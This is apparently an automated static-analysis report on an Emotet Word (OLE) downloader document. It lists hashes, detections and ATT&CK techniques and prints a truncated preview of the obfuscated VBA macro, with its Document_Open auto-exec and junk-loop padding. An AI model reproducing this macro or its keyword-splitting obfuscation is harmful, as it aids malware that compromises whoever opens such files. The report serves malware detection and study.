Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 dbe02a8c741267d6…

MALICIOUS

Office (OLE)

Size: 178.8 KB
Created: 2019-12-12 13:17:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: e495c1d1c3f4eb60ede6d5778dfee2a7
SHA-1: b750525d96239a9ac4b2c8579c29c0c768ad8065
SHA-256: dbe02a8c741267d609c6c5248a53303fb45e012d6e343b7a98ec30d4defa9579
Risk Score: 262

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-7448070-0, indicating it is likely part of the Emotet botnet. Critical heuristics indicate the presence of obfuscated VBA macros, specifically a Document_Open macro that uses CreateObject and reassembles the dangerous API name 'winmgmts' from split string literals. This suggests the macro is designed to download and execute a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-7448070-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7448070-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8720 bytes
SHA-256: 4eeb04229e81dfe706c59fc4a82ff604bc40edff259d24b105b2e1e8b800c71c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Vyvqzuvyv"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Cqwreudpec, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   For Nehjkaim = Mplkjouk To 0
      For Soignsrc = Syhpjurvr To 0
         Ederxwdu = (23 + Round(WOJOkxR3))
      Next
      Vasjzvavsifhz = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Ivapwytobol = uzH To MZDUoaj1
         Qvoibjwxogk = ChrB(dANsZ68a4)
         Next
      For Ayuvxdscpad = 0 To 0
         Zclrvnrle = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Psimvmgqagtar = Ihhagvdzy To 0
      For Bemxxwsketxji = Bjviscftlbtfd To 0
         Tjxzlcecjx = (23 + Round(WOJOkxR3))
      Next
      Ymlxyriuu = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Wtwkbwdqpit = uzH To MZDUoaj1
         Mjxvxhmkkvg = ChrB(dANsZ68a4)
         Next
      For Duovhrpt = 0 To 0
         Ordffhsyf = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Prokwsaysy = Ibhsmjrhkgem To 0
      For Ngfpxxobrlwbg = Qpzejykjeaxip To 0
         Mbryeusdbx = (23 + Round(WOJOkxR3))
      Next
      Jvwkcnhtr = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Jzdxaozpyb = uzH To MZDUoaj1
         Ujizfxlygdrbn = ChrB(dANsZ68a4)
         Next
      For Uvigshthzbw = 0 To 0
         Biifawbauoc = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Kekzylcfmlzal
End Sub

Attribute VB_Name = "Eqgqcukkqs"
Attribute VB_Base = "0{21FB5824-F079-4E17-8E1E-3180FAE51311}{E9A9A18F-FA77-4D29-BE77-0B4E0B3540B2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Bvktkpmcp"
Function Gvrewgkb()
   For Febkcapmgqor = Dtmpuwwphqai To 0
      For Ppxtqzleg = Vmeesqwxpz To 0
         Mxdyqwkkuzhxr = (23 + Round(WOJOkxR3))
      Next
      Amjymsgyjrko = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Klitrlvn = uzH To MZDUoaj1
         Hwjovfhnzvvl = ChrB(dANsZ68a4)
         Next
      For Jffzthfi = 0 To 0
         Jozdahznl = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Fgalqfiwcdkn = Vyvqzuvyv.Cqwreudpec
   For Ggfuxnlyp = Istpqcarsxv To 0
      For Mvwczlcpvrkxa = Jtmhrmqvbbyoz To 0
         Kkmhicqi = (23 + Round(WOJOkxR3))
      Next
      Pxmbjrql = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Ylnckvaub = uzH To MZDUoaj1
         Cdshzlsivtlne = ChrB(dANsZ68a4)
         Next
      For Dusjhdxeezw = 0 To 0
         Mbwhxgmutukgx = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Spucpfsgd = Fgalqfiwcdkn + Eqgqcukkqs.Bznaxyfwp + Eqgqcukkqs.Zkvepwts + Eqgqcukkqs.Rygksenvkbp
   For Yeoyziucy = Axzlpxcvtrnh To 0
      For Kgepovubccer = Aynkrmowuqi To 0
         Rqrlxifocp = (23 + Round(WOJOkxR3))
      Next
      Kzyuxhxbnv = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Cptfoloh = uzH To MZDUoaj1
         Dllrgirayj = ChrB(dANsZ68a4)
         Next
      For Gmpbxike = 0 To 0
         Vnjhpazqafbav = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Cvukvxnunvnbd = Spucpfsgd + Eqgqcukkqs.Ydoehzjxowhl + Eqgqcukkqs.Ejxfdtxi.ControlTipText
   For Asddhtgzbw = Cewtwsfwgp To 0
      For Tyxclnzjm = Kmkmcrbh To 0
         Vkvdqjvasfkgy = (23 + Round(WOJOkxR3))
      Next
      Vdooxawfbl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Fdeeifexnc = uzH To MZDUoaj1
         Dejuqseobego = ChrB(dANsZ68a4)
         Next
      For Izzftsjypwoa = 0 To 0
         Tmvtftkt = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Gvrewgkb = Eeucouafvnce + Cvukvxnunvnbd + Eeucouafvnce
   For Lhgdygaw = Ndlebqrgts To 0
      For Qmhxsotndnnd = Spfruwhxjdv 
... (truncated)